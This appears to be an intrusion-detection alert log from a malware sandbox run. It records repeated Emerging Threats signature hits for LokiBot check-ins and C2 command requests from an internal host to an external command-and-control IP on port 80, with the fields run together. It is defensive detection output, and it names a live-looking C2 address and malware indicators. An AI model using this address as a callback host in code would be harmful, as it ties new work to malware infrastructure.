                                11/22/21-15:30:27.944697TCP2025381ET TROJAN LokiBot Checkin4988080192.168.11.20192.185.217.246
                                11/22/21-15:30:27.944697TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2025381ET TROJAN LokiBot Checkin4988180192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2025381ET TROJAN LokiBot Checkin4988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2025381ET TROJAN LokiBot Checkin4988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2025381ET TROJAN LokiBot Checkin4988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2025381ET TROJAN LokiBot Checkin4988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2025381ET TROJAN LokiBot Checkin4988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2025381ET TROJAN LokiBot Checkin4988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2025381ET TROJAN LokiBot Checkin4988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2025381ET TROJAN LokiBot Checkin4988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2025381ET TROJAN LokiBot Checkin4989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2025381ET TROJAN LokiBot Checkin4989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2025381ET TROJAN LokiBot Checkin4989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2025381ET TROJAN LokiBot Checkin4989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2025381ET TROJAN LokiBot Checkin4989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2025381ET TROJAN LokiBot Checkin4989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2025381ET TROJAN LokiBot Checkin4989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2025381ET TROJAN LokiBot Checkin4989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2025381ET TROJAN LokiBot Checkin4989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2025381ET TROJAN LokiBot Checkin4989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2025381ET TROJAN LokiBot Checkin4990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2025381ET TROJAN LokiBot Checkin4990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2025381ET TROJAN LokiBot Checkin4990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2025381ET TROJAN LokiBot Checkin4990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2025381ET TROJAN LokiBot Checkin4990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2025381ET TROJAN LokiBot Checkin4990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2025381ET TROJAN LokiBot Checkin4990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2025381ET TROJAN LokiBot Checkin4990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2025381ET TROJAN LokiBot Checkin4990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2025381ET TROJAN LokiBot Checkin4990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2025381ET TROJAN LokiBot Checkin4991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2025381ET TROJAN LokiBot Checkin4991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2025381ET TROJAN LokiBot Checkin4991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2025381ET TROJAN LokiBot Checkin4991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2025381ET TROJAN LokiBot Checkin4991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2025381ET TROJAN LokiBot Checkin4991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2025381ET TROJAN LokiBot Checkin4991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2025381ET TROJAN LokiBot Checkin4991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2025381ET TROJAN LokiBot Checkin4991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2025381ET TROJAN LokiBot Checkin4991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2025381ET TROJAN LokiBot Checkin4992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2025381ET TROJAN LokiBot Checkin4992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2025381ET TROJAN LokiBot Checkin4992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2025381ET TROJAN LokiBot Checkin4992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2025381ET TROJAN LokiBot Checkin4992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2025381ET TROJAN LokiBot Checkin4992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2025381ET TROJAN LokiBot Checkin4992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2025381ET TROJAN LokiBot Checkin4992780192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2025381ET TROJAN LokiBot Checkin4992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.11.20192.185.217.246
                                11/22/21-15:31:08.565990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.11.20192.185.217.246
                                11/22/21-15:31:08.565990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.11.20192.185.217.246
                                11/22/21-15:31:08.565990TCP2025381ET TROJAN LokiBot Checkin4992980192.168.11.20192.185.217.246
                                11/22/21-15:31:08.565990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.11.20192.185.217.246
                                11/22/21-15:31:09.430599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.11.20192.185.217.246
                                11/22/21-15:31:09.430599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.11.20192.185.217.246
                                11/22/21-15:31:09.430599TCP2025381ET TROJAN LokiBot Checkin4993080192.168.11.20192.185.217.246
                                11/22/21-15:31:09.430599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.11.20192.185.217.246
                                11/22/21-15:31:10.226780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.11.20192.185.217.246
                                11/22/21-15:31:10.226780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.11.20192.185.217.246
                                11/22/21-15:31:10.226780TCP2025381ET TROJAN LokiBot Checkin4993180192.168.11.20192.185.217.246
                                11/22/21-15:31:10.226780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.11.20192.185.217.246
                                11/22/21-15:31:11.072236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.11.20192.185.217.246
                                11/22/21-15:31:11.072236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.11.20192.185.217.246
                                11/22/21-15:31:11.072236TCP2025381ET TROJAN LokiBot Checkin4993280192.168.11.20192.185.217.246
                                11/22/21-15:31:11.072236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.11.20192.185.217.246
                                11/22/21-15:31:11.951268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.11.20192.185.217.246
                                11/22/21-15:31:11.951268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.11.20192.185.217.246
                                11/22/21-15:31:11.951268TCP2025381ET TROJAN LokiBot Checkin4993380192.168.11.20192.185.217.246
                                11/22/21-15:31:11.951268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.11.20192.185.217.246
                                11/22/21-15:31:12.770040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.11.20192.185.217.246
                                11/22/21-15:31:12.770040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.11.20192.185.217.246
                                11/22/21-15:31:12.770040TCP2025381ET TROJAN LokiBot Checkin4993480192.168.11.20192.185.217.246
                                11/22/21-15:31:12.770040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.11.20192.185.217.246
                                11/22/21-15:31:13.633120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.11.20192.185.217.246
                                11/22/21-15:31:13.633120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.11.20192.185.217.246
                                11/22/21-15:31:13.633120TCP2025381ET TROJAN LokiBot Checkin4993580192.168.11.20192.185.217.246
                                11/22/21-15:31:13.633120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.11.20192.185.217.246
                                11/22/21-15:31:14.449904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.11.20192.185.217.246
                                11/22/21-15:31:14.449904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.11.20192.185.217.246
                                11/22/21-15:31:14.449904TCP2025381ET TROJAN LokiBot Checkin4993680192.168.11.20192.185.217.246
                                11/22/21-15:31:14.449904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.11.20192.185.217.246
                                11/22/21-15:31:15.235882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.11.20192.185.217.246
                                11/22/21-15:31:15.235882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.11.20192.185.217.246
                                11/22/21-15:31:15.235882TCP2025381ET TROJAN LokiBot Checkin4993780192.168.11.20192.185.217.246
                                11/22/21-15:31:15.235882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.11.20192.185.217.246
                                11/22/21-15:31:16.058685TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.11.20192.185.217.246
                                11/22/21-15:31:16.058685TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.11.20192.185.217.246
                                11/22/21-15:31:16.058685TCP2025381ET TROJAN LokiBot Checkin4993880192.168.11.20192.185.217.246
                                11/22/21-15:31:16.058685TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.11.20192.185.217.246
                                11/22/21-15:31:16.868716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.11.20192.185.217.246
                                11/22/21-15:31:16.868716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.11.20192.185.217.246
                                11/22/21-15:31:16.868716TCP2025381ET TROJAN LokiBot Checkin4993980192.168.11.20192.185.217.246
